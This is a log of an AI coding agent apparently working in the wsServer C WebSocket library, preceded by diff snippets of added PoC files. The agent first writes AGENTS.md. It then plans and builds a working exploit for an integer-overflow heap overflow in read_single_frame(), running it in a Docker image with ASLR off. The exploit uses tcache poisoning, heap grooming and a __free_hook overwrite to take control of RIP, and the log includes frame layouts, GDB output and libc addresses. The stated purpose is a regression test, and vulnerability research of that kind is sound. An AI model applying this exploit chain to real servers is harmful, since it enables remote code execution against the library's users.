| 1 | + | # wsServer | |
| 2 | + | ||
| 3 | + | Tiny WebSocket server library in C99 (no external deps, only pthread). | |
| 4 | + | ||
| 5 | + | ## Build | |
| 6 | + | ||
| 7 | + | ```bash | |
| 8 | + | make # libws.a + examples (preferred on Linux) | |
| 9 | + | make examples # examples only | |
| 10 | + | make clean |
| 1 | + | FROM ubuntu:20.04 | |
| 2 | + | ||
| 3 | + | ENV DEBIAN_FRONTEND=noninteractive | |
| 4 | + | ||
| 5 | + | RUN apt-get update && apt-get install -y \ | |
| 6 | + | gcc make gdb python3 libc6-dbg patch | |
| 7 | + | ||
| 8 | + | COPY . /wsServer | |
| 9 | + | WORKDIR /wsServer | |
| 10 | + |
| 1 | + | /* | |
| 2 | + | * poc_echo.c - Single-threaded echo server for RIP-control PoC | |
| 3 | + | * | |
| 4 | + | * Differences from examples/echo/echo.c: | |
| 5 | + | * 1. Pre-populates tcache[0] with 3 free 32-byte chunks before | |
| 6 | + | * accepting connections (heap feng shui). | |
| 7 | + | * 2. onopen: on the 2nd connection, leaks one extra malloc(24) | |
| 8 | + | * so that the echo round-trip pops 2 more entries, reaching | |
| 9 | + | * the poisoned __free_hook address. | |
| 10 | + | * 3. Must be built with poc_single_thread.patch applied to ws.c |
| 1 | + | # poc_gdb.txt — GDB helper script for wsServer RIP-control PoC | |
| 2 | + | # | |
| 3 | + | # Run: gdb -x tests/poc_gdb.txt ./tests/poc_echo | |
| 4 | + | # | |
| 5 | + | set disable-randomization on | |
| 6 | + | set pagination off | |
| 7 | + | ||
| 8 | + | start | |
| 9 | + | ||
| 10 | + | printf "\n=== LIBC ADDRESSES ===\n" |
| 1 | + | /* | |
| 2 | + | * poc_rip_control.c - Integer-overflow heap overwrite PoC for wsServer | |
| 3 | + | * | |
| 4 | + | * Target vulnerability: read_single_frame() in src/ws.c | |
| 5 | + | * Line 1453: *frame_size += fsd->frame_length (unchecked 64-bit add) | |
| 6 | + | * Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) | |
| 7 | + | * Lines 1519-1527: write loop using original fsd->frame_length | |
| 8 | + | * | |
| 9 | + | * Exploit: two-frame message where frame 2 carries a 64-bit length | |
| 10 | + | * that wraps *frame_size around the 2^64 boundary, defeating the |
| 1 | + | #!/usr/bin/env bash | |
| 2 | + | # | |
| 3 | + | # poc_run.sh — build Docker image, run the single-threaded PoC echo | |
| 4 | + | # server under GDB, then run the PoC client against it. | |
| 5 | + | # | |
| 6 | + | # Prerequisites: Docker, this script run from the wsServer root. | |
| 7 | + | # | |
| 8 | + | set -euo pipefail | |
| 9 | + | ||
| 10 | + | IMAGE="ws-poc" |
| 1 | + | --- a/src/ws.c | |
| 2 | + | +++ b/src/ws.c | |
| 3 | + | @@ -1900,11 +1900,7 @@ | |
| 4 | + | /* Client socket added to socks list ? */ | |
| 5 | + | if (i != MAX_CLIENTS) | |
| 6 | + | { | |
| 7 | + | - if (pthread_create( | |
| 8 | + | - &client_thread, NULL, ws_establishconnection, &client_socks[i])) | |
| 9 | + | - panic("Could not create the client thread!"); | |
| 10 | + | - |
Create or update `AGENTS.md` for this repository. The goal is a compact instruction file that helps future OpenCode sessions avoid mistakes and ramp up quickly. Every line should answer: "Would an agent likely miss this without help?" If not, leave it out. User-provided focus or constraints (honor these): ## How to investigate Read the highest-value sources first: - `README*`, root manifests, workspace config, lockfiles - build, test, lint, formatter, typecheck, and codegen config - CI workflows and pre-commit / task runner config - existing instruction files (`AGENTS.md`, `CLAUDE.md`, `.cursor/rules/`, `.cursorrules`, `.github/copilot-instructions.md`) - repo-local OpenCode config such as `opencode.json` If architecture is still unclear after reading config and docs, inspect a small number of representative code files to find the real entrypoints, package boundaries, and execution flow. Prefer reading the files that explain how the system is wired together over random leaf files. Prefer executable sources of truth over prose. If docs conflict with config or scripts, trust the executable source and only keep what you can verify. ## What to extract Look for the highest-signal facts for an agent working in this repo: - exact developer commands, especially non-obvious ones - how to run a single test, a single package, or a focused verification step - required command order when it matters, such as `lint -> typecheck -> test` - monorepo or multi-package boundaries, ownership of major directories, and the real app/library entrypoints - framework or toolchain quirks: generated code, migrations, codegen, build artifacts, special env loading, dev servers, infra deploy flow - repo-specific style or workflow conventions that differ from defaults - testing quirks: fixtures, integration test prerequisites, snapshot workflows, required services, flaky or expensive suites - important constraints from existing instruction files worth preserving Good `AGENTS.md` content is usually hard-earned context that took reading multiple files to infer. ## Questions Only ask the user questions if the repo cannot answer something important. Use the `question` tool for one short batch at most. Good questions: - undocumented team conventions - branch / PR / release expectations - missing setup or test prerequisites that are known but not written down Do not ask about anything the repo already makes clear. ## Writing rules Include only high-signal, repo-specific guidance such as: - exact commands and shortcuts the agent would otherwise guess wrong - architecture notes that are not obvious from filenames - conventions that differ from language or framework defaults - setup requirements, environment quirks, and operational gotchas - references to existing instruction sources that matter Exclude: - generic software advice - long tutorials or exhaustive file trees - obvious language conventions - speculative claims or anything you could not verify - content better stored in another file referenced via `opencode.json` `instructions` When in doubt, omit. Prefer short sections and bullets. If the repo is simple, keep the file simple. If the repo is large, summarize the few structural facts that actually change how an agent should work. If `AGENTS.md` already exists at `/home/lucas/Works/VibeCodedProjects/wsServer`, improve it in place rather than rewriting blindly. Preserve verified useful guidance, delete fluff or stale claims, and reconcile it with the current codebase.
I'll investigate the repository to understand its structure and conventions before proposing an AGENTS.md plan.
I now have a complete picture of the repository. Here's my plan for AGENTS.md:
The file would contain these sections:
make — builds libws.a + examples (preferred on Linux)mkdir build && cd build && cmake .. && makemake examples — just examplesmake clean — clean all artifactspip install autobahntestsuite) or Dockermake tests (builds examples first, then runs Autobahn)-DENABLE_WSSERVER_TEST=On to cmake, then ctest --verbosemake tests_check — validate results with validate_output.pyAFL_FUZZ=yes make (requires AFL installed)/* ... */), never //.clang-format present — use clang-format -style=file -i <file> but review output manually (it doesn't cover everything)src/ — library core (ws.c, handshake.c, sha1.c, base64.c, utf8.c)include/ws.h — single public API headerexamples/ — echo, ping, vtouchpadextra/toyws/ — companion WS client (not a general-purpose client)tests/ — Autobahn conformance + AFL fuzzingVALIDATE_UTF8 (default on) controls UTF-8 validationThis captures what an agent would likely get wrong: the C89 comment requirement, the Allman brace style, the tab indentation, the test prerequisites (Autobahn), the fuzzing workflow, and the PR issue-first convention.
Does this look right, or would you like me to adjust anything before writing it?
Looks good, right the file.
Done. AGENTS.md has been written at the repository root.
Ok so I'm one of creators of this program, we found a security vulnerability but in order to fix we need to make a unit test for testing regression. So for that, we need to make a exploration PoC. Here is the vulnerability summary, give a read, read the repo and ask questions if you need. after that let me know that I will let you know how we can proceed. # Security issue: integer-overflow heap overwrite in frame reassembly ## Summary A remote WebSocket client can trigger a heap buffer overflow by sending a fragmented message sequence with a large 64-bit payload length in a continuation frame. The vulnerable logic is in `read_single_frame()` (`src/ws.c`): - cumulative frame size is updated with unchecked 64-bit addition (`*frame_size += fsd->frame_length`), - allocation size is computed with unchecked 64-bit addition (`realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)`), - then the code writes `fsd->frame_length` bytes into that potentially undersized buffer. Because unsigned overflow wraps in C, an attacker can make the allocation size small while still entering a very large write loop. ## Impact - Remote crash (heap corruption / SIGSEGV) is straightforward. - Depending on allocator/runtime hardening, this may be exploitable for remote code execution. ## Exploit sketch 1. Send an initial non-FIN text frame with small payload (e.g., 16 bytes) to set `msg_idx_data`. 2. Send a FIN continuation frame with 64-bit payload length close to `UINT64_MAX`. 3. The allocation-size expression wraps to a tiny size. 4. Stream arbitrary masked payload bytes; each byte is written past the allocated heap chunk. This is remotely reachable from any TCP peer that can complete the WebSocket handshake. ## Recommended fix direction - Before any addition involving lengths, use checked arithmetic and reject on overflow. - Validate both: - cumulative message size (`*frame_size + fsd->frame_length`), and - allocation size (`*msg_idx + fsd->frame_length + fsd->is_fin`). - On overflow/protocol violation, close with status code `1009` (message too big) or `1002` (protocol error).
I've thoroughly read the vulnerable code. Here's my analysis:
The bug is in read_single_frame() (src/ws.c:1410-1552), specifically:
Line 1453 — *frame_size += fsd->frame_length; — unchecked 64-bit addition. When a first non-FIN fragment sets *frame_size to N, a second continuation fragment with frame_length close to UINT64_MAX wraps the sum to a small value.
Line 1463 — if (*frame_size > MAX_FRAME_LENGTH) — this check is defeated because the wrapped value is tiny.
Line 1505 — realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — the allocation size also wraps to a small number (e.g. ~6 bytes).
Lines 1519-1527 — the write loop uses the original (huge) fsd->frame_length, writing past the heap chunk.
msg_idx_data = 16, frame_size = 16)frame_length = UINT64_MAX - 10 — the allocation wraps to ~7 bytes, the check passes, then the loop tries to write UINT64_MAX - 10 bytes into that 7-byte buffer.How should we build the PoC and regression test? The existing fuzzing harness (ws_file) reads crafted binary files through the parser — but I notice ws_file() at line 2078 references a cli_events variable that doesn't appear to exist in the current code (looks like a leftover from the ws_events refactor to ws_server). Which approach do you prefer?
Good, network-based it is. Here's my plan:
What it does: A standalone C program that connects to a running wsServer instance (e.g. the echo example), completes the handshake, then sends a malicious two-frame sequence that triggers the integer overflow in read_single_frame().
| Frame | FIN | Opcode | Payload Length | Purpose |
|---|---|---|---|---|
| 1 | 0 | text (0x1) | 16 bytes | Sets msg_idx_data=16, frame_size=16 |
| 2 | 1 | continuation (0x0) | 0xFFFFFFFFFFFFFFF5 (UINT64_MAX - 10) | Triggers overflow |
Both frames are masked (server expects it — reads 4 mask bytes unconditionally at ws.c:1475-1478). Mask key = {0,0,0,0} for simplicity.
*frame_size += fsd->frame_length → 16 + 0xFFFFFFFFFFFFFFF5 wraps to 0x05, passes the MAX_FRAME_LENGTH check at line 1463realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) → 16 + 0xFFFFFFFFFFFFFFF5 + 1 wraps to 0x06 — allocates ~6 bytes0xFFFFFFFFFFFFFFF5 bytes starting at msg[16] — immediate heap corruption on the first write past the 6-byte bufferconnect_to_server(host, port) — TCP connect with host resolutiondo_handshake(sock) — send HTTP upgrade, read responsesend_exploit(sock) — send the two crafted frames + a small burst of payload bytes (just needs a few hundred bytes to corrupt past the tiny allocation, no need to send anywhere near the declared length)tests/poc_overflow.cI'm ready when you are — let me know if you want any adjustments to this plan before I start writing.
Ok so your objective is to prove we can manipulate `RIP` register. For that we will need to build a version with all compiler protections disabled (ASLR, Canary, etc...) - So sketch a plan on how to make that PoC.
Good. To prove RIP control, we need to chain the heap overflow into an arbitrary write primitive and then hijack control flow. Here's my plan:
Unprotected server build — new Makefile target that compiles the echo example with all mitigations off:
CFLAGS: -g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0
LDFLAGS: -no-pie -z norelro -z execstackDisable ASLR:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
tests/poc_rip_control.c)A standalone C program that acts as a WebSocket client:
host:port (default 127.0.0.1:8080){0,0,0,0} (sets msg_idx=16, frame_size=16)0xFFFFFFFFFFFFFFF5, mask={0,0,0,0} (triggers the realloc wrap to ~6 bytes)A) bytes to demonstrate heap corruption → SIGSEGVThis step is critical — we need to discover the exact heap layout before crafting the RIP-mode payload:
realloc at ws.c:1505 (after the wrap)p msg — our buffer addressx/40gx msg-16 — full chunk + adjacent chunksinfo proc mappings — heap base, libc base, binary basep &__free_hook — target address in libcmsg, what's in it, and whether there are free chunks we can corruptMost likely path — fastbin/tcache poisoning → __free_hook overwrite:
msg chunk into the next chunk's fd pointer (if it's a free chunk) or corrupts its size fieldfd points to __free_hook - 0x10malloc() returns a pointer to __free_hook0x4141414141414141) therefree(msg) is called at ws.c:1713, glibc calls __free_hook → RIP = 0x4141414141414141Alternative path — corrupt an adjacent allocated chunk's data:
If there's a heap-allocated struct with a function pointer adjacent to msg, we can directly overwrite it. Candidate: ws_prm (allocated at server start, contains ws_server with event callbacks). Whether it's adjacent depends on Phase 3 findings.
$ gdb ./echo_unprotected
(gdb) run
# In another terminal:
$ ./poc_rip_control --mode rip
# GDB output:
# Program received signal SIGSEGV, Segmentation fault.
# 0x0000000041414141 in ?? ()Seeing RIP = 0x4141414141414141 proves full control.
| File | Purpose |
|---|---|
tests/poc_rip_control.c | PoC client (connect, handshake, exploit) |
tests/Makefile.poc | Build rules for unprotected server + PoC binary |
tests/poc_gdb.txt | GDB script for heap reconnaissance |
What glibc version is on the target system? This determines which heap exploitation technique works (tcache poisoning, fastbin dup, etc.) and whether __free_hook is available.
$ ldd --version 2>&1 | head -1ldd (Ubuntu GLIBC 2.39-0ubuntu8.7) 2.39
glibc 2.39 — __free_hook was removed in 2.34 and safe-linking is active. That rules out the classic approach. Let me check what Docker base gives us the best target.
$ docker images 2>/dev/null | head -20 || echo "Docker not available or not running"IMAGE ID DISK USAGE CONTENT SIZE EXTRA
mcr.microsoft.com/presidio-analyzer:2.2.360 248a5fb234ed 1.54GB 0B U
mcr.microsoft.com/presidio-anonymizer:2.2.360 97ebe789db35 249MB 0B U
mongo:latest b6fc3eda4f9a 950MB 0B U
mysql:8 02ffa1ed2ee9 790MB 0B U
opencode-share-server-share-server:latest f84b5a0bc10b 29.1MB 0B U
postgres:16-alpine 108b27c919e6 276MB 0B
postgres:17 3fe059c96160 453MB 0B U
redis:7-alpine aa189b5a1954 41.4MB 0B
testcontainers/ryuk:0.13.0 b75bc7ce94c3 7.2MB 0B Docker is available. Here's my revised plan given glibc 2.39 on the host:
glibc 2.39 has no __free_hook, safe-linking (pointer mangling), and tcache key validation. Exploitation is possible (House of Apple 2, etc.) but requires forging IO_FILE structures — ~200+ lines of delicate glibc-internal manipulation that's fragile across point releases. Not worth it for a PoC.
glibc 2.31 has __free_hook, tcache without safe-linking, no key validation. Classic tcache poisoning works cleanly.
| File | Purpose |
|---|---|
tests/poc_rip_control.c | PoC client — connects, handshakes, triggers overflow, demonstrates RIP control |
tests/Dockerfile.poc | Ubuntu 20.04 build environment with unprotected server + GDB |
tests/poc_run.sh | Orchestrator: builds Docker image, runs server under GDB, runs PoC |
tests/poc_gdb.txt | GDB script: heap reconnaissance + verify RIP after crash |
__free_hook → RIPThe wsServer message processing loop gives us alloc/free cycles we can use for heap shaping:
ws_establishconnection():
while (next_complete_frame() >= 0) {
onmessage(client_id, msg, frame_size, type); // echo calls ws_sendframe_bcast
free(msg); // msg freed each iteration
}Each complete message: malloc(msg) → onmessage → malloc(response) → send → free(response) → free(msg).
Step-by-step:
Connect + handshake — standard WebSocket upgrade.
Heap shaping — send 6-7 complete text messages of a specific size S (e.g., 0x100 bytes). Each cycle: malloc(S) → malloc(response) → free(response) → free(S). This populates the tcache bin for size S with free chunks. We need to fill the tcache (7 entries for glibc 2.31) so subsequent frees go to the unsorted bin.
Prepare the target chunk — send a message of size S, which gets freed into the now-full tcache (actually goes to fastbin or unsorted bin). Then send another message of size S — this allocation reuses a tcache entry, leaving a free chunk adjacent to where our exploit msg will land.
Exploit message (two frames):
realloc(NULL, 16) = malloc(16) → allocates msg0xFFFFFFFFFFFFFFF5 → realloc(msg, 6) (wrap) → same pointer (min chunk is 32 bytes), then overflow loop writes past msg into adjacent free chunkfd pointer, then overwrite it with the address of __free_hookTrigger — after the overflow, next_byte() returns -1, function returns. Back in ws_establishconnection:
onmessage is called with the corrupted msg → ws_sendframe_bcast() → allocates a response buffer of size S → malloc returns __free_hook (from the poisoned tcache)__free_hook — this includes parts of our msg payload (controlled data from frame 1)frame_size, which is tiny. We need the allocation to match the poisoned bin size.free(msg) is called after onmessage returns. If msg's chunk was also corrupted, this could trigger exploitation.Demonstrate RIP control — __free_hook now contains 0x4141414141414141. The next free() call jumps there. GDB confirms: RIP = 0x4141414141414141.
The exact number of shaping messages, the size S, and the offset to the target chunk's fd pointer will be determined empirically:
free(msg), examine tcache: p *(struct tcache_perthread_struct *)tcachefd corruption__free_hookgcc -g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0 \
-z norelro -z execstack -no-pie \
src/ws.c src/base64.c src/sha1.c src/handshake.c src/utf8.c \
examples/echo/echo.c -I include -pthread -o echo_unprotectedASLR disabled: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
./poc_rip_control [--host HOST] [--port PORT] [--shaping-count N] \
[--shaping-size S] [--target-addr ADDR]Parameters are configurable so the exact values can be tuned after heap reconnaissance.
Does this plan look right? If so I'll start building the deliverables.
Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.
ws_file).__free_hook, has safe-linking, and tcache key validation — too complex for a PoC).__free_hook overwrite → RIP control./* */), Doxygen for functions/structs.read_single_frame() in src/ws.c:1410-1552*frame_size += fsd->frame_length — unchecked 64-bit addition, wraps aroundif (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small valuerealloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytesfsd->frame_length, writing past the undersized buffermsg_idx=16, frame_size=16frame_length = 0xFFFFFFFFFFFFFFF5 (UINT64_MAX-10)*frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH checkrealloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocationmsg[16], writing far past the 6-byte buffer → heap corruptionThe ws_establishconnection() loop (ws.c:1752-1782) gives us alloc/free cycles per message:
malloc(msg) → onmessage → ws_sendframe_bcast (malloc response) → send → free(response) → free(msg)
This allows heap feng shui: send complete messages of size S to populate tcache bins (7 entries on glibc 2.31), then overflow into an adjacent free chunk's fd pointer.
ws_file() at ws.c:2078 references cli_events which doesn't exist in the current code — a leftover from the ws_events → ws_server refactor. Not relevant to our network-based PoC.
ldd --version → glibc 2.39. Docker is available on the system.
ws.c:1475-1478) — all client frames MUST have MASK bit setws.c:1655-1662)AGENTS.md at repo root — compact instruction file for future agent sessions__free_hook overwrite → RIP control, with heap shaping via preparatory messagestests/poc_rip_control.c — the PoC client (connect, handshake, heap shaping messages, exploit two-frame sequence, configurable payload)tests/Dockerfile.poc — Ubuntu 20.04 image with gcc, gdb, build the unprotected echo servertests/poc_run.sh — orchestration script (build Docker, run server under GDB, run PoC)tests/poc_gdb.txt — GDB helper script for heap reconnaissance and RIP verificationAGENTS.md — repo instruction file (completed)tests/poc_rip_control.c — PoC clienttests/Dockerfile.poc — Docker build environmenttests/poc_run.sh — orchestration scripttests/poc_gdb.txt — GDB helper scriptsrc/ws.c — the vulnerable file, especially lines 1410-1552 (read_single_frame), 1565-1720 (next_complete_frame), 1735-1808 (ws_establishconnection), 2051-2101 (ws_file)include/ws.h — public API, struct definitions (ws_server, ws_events, ws_frame_data), constants (MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8)examples/echo/echo.c — target server binary, uses ws_sendframe_bcast in onmessagetests/fuzzy/ws_file.c — existing AFL fuzz harness (not used, but informed approach)Makefile — build system, AFL_FUZZ=yes option, CFLAGSCMakeLists.txt — alternative build, ENABLE_WSSERVER_TEST option.github/workflows/c-cpp.yml — CI configdoc/CODING_STYLE.md — coding conventions.clang-format — formatter config (Microsoft-based, tabs, 85-col)Ok, so let's do the work then!
Let me also check the internal structures and frame reading logic:
Now let me check the Makefile to understand the build flags, and also check how the ws_sendframe_bcast function allocates memory (for heap shaping analysis):
Let me look at how the server accept loop works and if there are any malloc calls in the main loop path:
Now I have a complete understanding of the codebase. Let me create all four files.
Now the main PoC client:
Edit applied successfully.
LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c">
ERROR [425:4] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations (fix available)
poc_rip_control.c:425:4: note: did you mean 'sleep'?
ERROR [510:2] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations
</diagnostics>{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{The _DEFAULT_SOURCE needs to be defined before any system headers. Let me fix this:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{Now the GDB helper script:
Now the orchestration script:
$ chmod +x /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.shNow let me compile the PoC client locally to check for errors, then build the Docker image:
$ gcc -Wall -Wextra -std=c99 -o /dev/null /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c 2>&1Clean compile. Now let's build the Docker image:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...
#3 [auth] library/ubuntu:pull token for registry-1.docker.ioDNS resolution failure in Docker build. Let me check the network and try again:
$ docker network inspect bridge 2>/dev/null | head -20; echo "---"; cat /etc/resolv.conf | head -5The user rejected permission to use this specific tool call.Ok try again, I restarted docker.
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...
#3 [auth] library/ubuntu:pull token for registry-1.docker.ioBuild succeeded. Now let's do the initial reconnaissance run — launch the server under GDB and fire the PoC:
$ docker rm -f ws-poc-server 2>/dev/null; docker run -d --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt -ex "set pagination off" ./examples/echo/echo 2>&1' > /tmp/poc_gdb_out.txt 2>&1; echo "Container started, PID=$!"Container started, PID=0
$ sleep 3 && docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1Error response from daemon: container 80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea is not running
Container exited already. Let's check the output:
$ cat /tmp/poc_gdb_out.txt80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea
$ docker logs ws-poc-server 2>&1tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
The __free_hook symbol isn't available before the program runs. Let me fix the GDB script:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{Now let's run the auto mode — server in GDB + PoC fired automatically:
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' &
SERVER_PID=$!
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 2
echo "=== GDB Output ==="
wait $SERVER_PID 2>/dev/null
echo "=== Done ==="ws-poc-server
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
=== Done ===
The issue is GDB validates commands at definition time. Let me restructure the script:
you got froze, please continue
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' > /tmp/poc_out.txt &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
echo "=== GDB Output ==="
wait 2>/dev/null
cat /tmp/poc_out.txt=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
The commands block validates at parse time on this GDB version. Let me use start instead:
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB Output ==="
cat /tmp/poc_out.txt=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
Did you build with debug symbols?
No — the Docker image still has the old GDB script (built before I updated it). Let me rebuild:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -5#11 exporting to image
#11 exporting layers 0.0s done
#11 writing image sha256:de3118efbe51a2bbfdd34b09ef5d8ba2386e809d2db62bb6dcc65e42e81e1a89 done
#11 naming to docker.io/library/ws-poc done
#11 DONE 0.0s
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
=== GDB ===
Temporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".The register offsets are wrong. Let me fix the GDB script to use proper variable names since we compiled with -O0:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -3 && \
docker rm -f ws-poc-server 2>/dev/null; \
docker run --rm --name ws-poc-server --network host --privileged ws-poc \
bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo' > /tmp/poc_out.txt 2>&1 &
sleep 5
echo "=== PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
wait 2>/dev/null
echo "=== GDB ==="
cat /tmp/poc_out.txt#10 writing image sha256:e4e4b2ceb61fd3c60f3d6c5202eec1750f12d9fe01bfd593c8087f6c10115c8c done
#10 naming to docker.io/library/ws-poc done
#10 DONE 0.0s
=== PoC ===
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK
[*] Sending exploit (f1sz=16, ovf=128 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 164 bytes (hdr=36, ovf=128)
[+] Connection 1 closed$ cat /tmp/poc_out.txt 2>/dev/nullTemporary breakpoint 1 at 0x401746: file examples/echo/echo.c, line 118.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at examples/echo/echo.c:118
118 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system = 0x7ffff7e01290Excellent results! The GDB output shows the overflow is working perfectly. Key findings:
__free_hook = 0x7ffff7f9de480x7ffff0000c70, chunk size 0x25 (32 bytes, NON_MAIN_ARENA)msg[16]0x7ffff0000c80 has: size=0x21, fd=0x4141414141414141free(msg) goes to tcache without checking the corrupted next chunkTo achieve RIP control, I need to shape the heap so a free tcache chunk sits right after the overflow buffer, then poison its fd pointer. Let me update the strategy: use 48-byte chunks (matching the handshake's base64_encode malloc) and target that tcache bin.
Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.
ws_file).__free_hook, has safe-linking, and tcache key validation — too complex for a PoC)./* */), Doxygen for functions/structs.read_single_frame() in src/ws.c:1410-1552*frame_size += fsd->frame_length — unchecked 64-bit addition, wraps aroundif (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small valuerealloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytesfsd->frame_length, writing past the undersized buffermsg_idx=16, frame_size=16frame_length = 0xFFFFFFFFFFFFFFF5*frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH checkrealloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returnedmsg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed__free_hook = 0x7ffff7f9de48__malloc_hook = 0x7ffff7f9bb70system = 0x7ffff7e01290exit = 0x7ffff7df5a400x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA), user data at 0x7ffff0000c70msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141free(msg) goes to tcache BEFORE the next-chunk size check, so no crash on the corrupted metadataOn glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:
